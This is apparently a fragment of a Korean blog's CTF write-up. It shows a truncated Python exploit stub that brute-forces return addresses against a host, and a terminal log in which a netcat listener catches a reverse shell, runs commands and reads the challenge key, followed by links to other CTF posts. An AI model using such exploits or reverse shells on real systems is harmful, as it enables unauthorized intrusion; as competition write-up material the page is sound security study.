exploit.py |
#!/usr/bin/python from socket import * def pack(data): HOST = "192.168.123.129" for ret in range(0xbfbfeb64 , 0xbfbfe000 , -20): |
[pwn3r@localhost hks]$ ./exploit.py & nc -lv 4444 [1] 14024 Connection from 192.168.123.129 port 4444 [tcp/krb524] accepted id uid=1009(hks) gid=1009(hks) groups=1009(hks) ls -l total 1220 -rwxr-xr-x 1 hks hks 595672 Sep 14 23:46 hksd -rw-r--r-- 1 hks hks 33 Sep 14 23:46 key cat key 2kscwfu0kqsgbdl1m7l56b01ghpmwzho |
'CTF' 카테고리의 다른 글
Defcon 19th CTF Quals - Retro Revisted 300 (0) | 2011.09.23 |
---|---|
ISEC 2011 본선 CTF - board (0) | 2011.09.21 |
Defcon 19th CTF 2011 Quals - Potent Pwnables 100 (0) | 2011.09.11 |
2010 순천향대 정보보호 페스티벌 level9 (0) | 2011.09.11 |
Padocon 2011 Quals - Karma200 (0) | 2011.07.17 |